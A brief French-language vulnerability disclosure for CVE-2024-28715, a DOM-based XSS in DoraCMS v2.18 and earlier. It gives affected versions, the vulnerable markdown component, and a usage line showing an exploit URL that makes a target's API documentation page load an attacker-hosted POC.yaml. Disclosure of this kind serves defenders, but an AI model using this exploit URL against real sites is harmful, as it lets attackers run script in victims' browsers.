
Preuve de concept d'exploit pour CVE-2024-28715, une vulnérabilité XSS basée sur le DOM dans DoraCMS v2.18 et versions antérieures, déclenchée via la fonction markdown0 dans le point de terminaison de la documentation API.
[ID CVE]
CVE-2024-28715
[PRODUIT]
DoraCMS
[Version]
DoraCMS v2.18 et antérieur
[TYPE DE PROBLÈME]
XSS basé sur le DOM.
[DESCRIPTION]
Vulnérabilité de Cross Site Scripting dans DOraCMS v.2.18 et antérieur permet à un attaquant distant d'exécuter du code arbitraire via la fonction markdown0 dans le point de terminaison /app/public/apidoc/oas3/wrap-components/markdown.jsx.
[Utilisation]
https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml